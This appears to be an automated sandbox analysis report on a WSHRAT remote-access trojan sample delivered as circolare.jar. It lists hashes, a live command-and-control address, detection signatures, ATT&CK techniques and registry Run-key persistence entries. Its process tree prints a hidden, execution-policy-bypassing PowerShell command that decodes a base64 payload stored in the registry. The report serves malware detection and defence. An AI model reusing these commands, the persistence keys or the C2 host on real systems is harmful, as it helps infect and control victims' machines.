wshrat | 50f8498fcc6d554f4d40cce16096172dc68a562f774aaa54cb1d708a95097452

General

Target

circolare.jar
Size

222KB
MD5

90e671a9d6318bd0b6c84f4d9a8405f7
SHA1

ad4b30cf76a76745618a47eb71d2f97527af5f69
SHA256

8ff89b316cfff559271ce4cb82584816829c79f0d4356358889284c822162c43
SHA512

797aff0b8f08a9c22735fdf54b5f29b7a1312086eeb1f37937c52432a6d67532dcbaf6a3fbbbbcb92691b7d74dea129ba418b55f3b7633b24c3399ffe81e74c9

Score

10^/10

wshrat persistence suricata trojan

Malware Config

Extracted

Family

wshrat

C2

http://pluginsrv2.duckdns.org:8899

Signatures

WSHRAT
WSHRAT is a variant of Houdini worm and has vbs and js variants.
trojan wshrat
suricata: ET MALWARE WSHRAT CnC Checkin
suricata: ET MALWARE WSHRAT CnC Checkin
suricata
suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1
suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1
suricata
Blocklisted process makes network request 6 IoCs

Processes:

WScript.exe

flow pid process

5 1776 WScript.exe
6 1776 WScript.exe
7 1776 WScript.exe
9 1776 WScript.exe
10 1776 WScript.exe
11 1776 WScript.exe

flow	pid	process
5	1776	WScript.exe
6	1776	WScript.exe
7	1776	WScript.exe
9	1776	WScript.exe
10	1776	WScript.exe
11	1776	WScript.exe

Drops startup file 2 IoCs

Processes:

WScript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JBajdBaxwJ.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JBajdBaxwJ.vbs	WScript.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

WScript.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\JBajdBaxwJ = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\JBajdBaxwJ.vbs\""	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\software\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Windows\CurrentVersion\Run\JBajdBaxwJ = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\JBajdBaxwJ.vbs\""	WScript.exe
Key created	\REGISTRY\MACHINE\software\microsoft\windows\currentversion\run	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

572 powershell.exe
1408 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 572 powershell.exe
Token: SeDebugPrivilege 1408 powershell.exe

pid	process
572	powershell.exe
1408	powershell.exe

description	pid	process
Token: SeDebugPrivilege	572	powershell.exe
Token: SeDebugPrivilege	1408	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

java.exewscript.execmd.exeWScript.exe

description	pid	process	target process
PID 1120 wrote to memory of 1112	1120	java.exe	wscript.exe
PID 1120 wrote to memory of 1112	1120	java.exe	wscript.exe
PID 1120 wrote to memory of 1112	1120	java.exe	wscript.exe
PID 1112 wrote to memory of 572	1112	wscript.exe	powershell.exe
PID 1112 wrote to memory of 572	1112	wscript.exe	powershell.exe
PID 1112 wrote to memory of 572	1112	wscript.exe	powershell.exe
PID 1112 wrote to memory of 1776	1112	wscript.exe	WScript.exe
PID 1112 wrote to memory of 1776	1112	wscript.exe	WScript.exe
PID 1112 wrote to memory of 1776	1112	wscript.exe	WScript.exe
PID 1112 wrote to memory of 1880	1112	wscript.exe	cmd.exe
PID 1112 wrote to memory of 1880	1112	wscript.exe	cmd.exe
PID 1112 wrote to memory of 1880	1112	wscript.exe	cmd.exe
PID 1880 wrote to memory of 2016	1880	cmd.exe	javaw.exe
PID 1880 wrote to memory of 2016	1880	cmd.exe	javaw.exe
PID 1880 wrote to memory of 2016	1880	cmd.exe	javaw.exe
PID 1776 wrote to memory of 1408	1776	WScript.exe	powershell.exe
PID 1776 wrote to memory of 1408	1776	WScript.exe	powershell.exe
PID 1776 wrote to memory of 1408	1776	WScript.exe	powershell.exe

C:\Windows\system32\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\circolare.jar
1⤵
- Suspicious use of WriteProcessMemory
PID:1120
- C:\Windows\system32\wscript.exe
  wscript C:\Users\Admin\zatguvunki.vbs
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1112
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$deleBravo = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'turK3y').turK3y;$deleBravo=$deleBravo.replace('%&','m');$Abt = [Convert]::FromBase64String($deleBravo);$Out = [System.Text.Encoding]::ASCII.GetString($Abt);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'turK3y' -value $Out -propertytype multistring -force | out-null;"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:572
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\JBajdBaxwJ.vbs"
    3⤵
    - Blocklisted process makes network request
    - Drops startup file
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:1776
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$deleBravo = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'turK3y').turK3y;$deleBravo=$deleBravo.replace('%&','A');$Abt = [Convert]::FromBase64String($deleBravo);$Out = [System.Text.Encoding]::ASCII.GetString($Abt);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'turK3y' -value $Out -propertytype multistring -force | out-null;"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1408
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c "C:\Program Files\Java\jre7\bin\javaw.exe" -version 2> C:\Users\Admin\AppData\Local\Temp\output.txt
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1880
  - - C:\Program Files\Java\jre7\bin\javaw.exe
      "C:\Program Files\Java\jre7\bin\javaw.exe" -version
      4⤵
      PID:2016

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\JBajdBaxwJ.vbs

Filesize
38KB

MD5
2040b52f012cebd59d5aede0556b6636

SHA1
2acbfc90f0cffdc6332f1747474e120c25c836e9

SHA256
d9d8d699a6e5d05328741dd6e4b9133e5bbaf1b73b8e548069dcb4dce0cf8fee

SHA512
ea594a4d76f231add4989a32ae9c354d933c049bfb94ed05ced4b7879a9fe12ae02fdac53ce9d615de99f1d61c83500bb306178689e32fe8380ffa8f9ba2b742

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
7b18ce5b87b9fae005926de9e17c7be0

SHA1
506eade69bf70a34203f704065a623c2ecc01bef

SHA256
e108c159352819c5d5ffaecba846cbea770f6d1a2311a656642aa9b86221ba89

SHA512
03abaf917a65af964cbbe97bba4bbd96a7020482a3083c15aa94b68440a9b7b2d38b19ade2fd3bcd9dee0051cb6750a20c6d44eaa2e19bebf6090df4944c3922

Download Submit
C:\Users\Admin\zatguvunki.vbs

Filesize
375KB

MD5
03a7ae43aaf89ff7e1764d216c90f22e

SHA1
fe638120295e1d35073973caf825b0996350ce76

SHA256
04cddb4f63ec0f578e61ab4424180f54a5a960040b618d87c27815c4a4bcebcc

SHA512
d8a89b30cf8314d37c4667811436697c5ad2afa94a01d0eb49819ee49dca2dd3452e24380b155267b7690ba91385c54812ed8ba59021addbaf5502fe53db7ac1

Download Submit
memory/572-69-0x0000000000000000-mapping.dmp

Download
memory/572-71-0x000007FEF2BC0000-0x000007FEF371D000-memory.dmp

Filesize
11.4MB

Download
memory/572-72-0x0000000002764000-0x0000000002767000-memory.dmp

Filesize
12KB

Download
memory/572-73-0x000000001B710000-0x000000001BA0F000-memory.dmp

Filesize
3.0MB

Download
memory/572-74-0x000000000276B000-0x000000000278A000-memory.dmp

Filesize
124KB

Download
memory/1112-65-0x0000000000000000-mapping.dmp

Download
memory/1120-54-0x000007FEFBAA1000-0x000007FEFBAA3000-memory.dmp

Filesize
8KB

Download
memory/1120-64-0x0000000002210000-0x0000000005210000-memory.dmp

Filesize
48.0MB

Download
memory/1408-98-0x00000000025DB000-0x00000000025FA000-memory.dmp

Filesize
124KB

Download
memory/1408-92-0x0000000000000000-mapping.dmp

Download
memory/1408-95-0x000007FEF3380000-0x000007FEF3EDD000-memory.dmp

Filesize
11.4MB

Download
memory/1408-96-0x00000000025D4000-0x00000000025D7000-memory.dmp

Filesize
12KB

Download
memory/1408-97-0x000000001B8D0000-0x000000001BBCF000-memory.dmp

Filesize
3.0MB

Download
memory/1776-75-0x0000000000000000-mapping.dmp

Download
memory/1880-77-0x0000000000000000-mapping.dmp

Download
memory/2016-88-0x00000000020A0000-0x00000000050A0000-memory.dmp

Filesize
48.0MB

Download
memory/2016-78-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads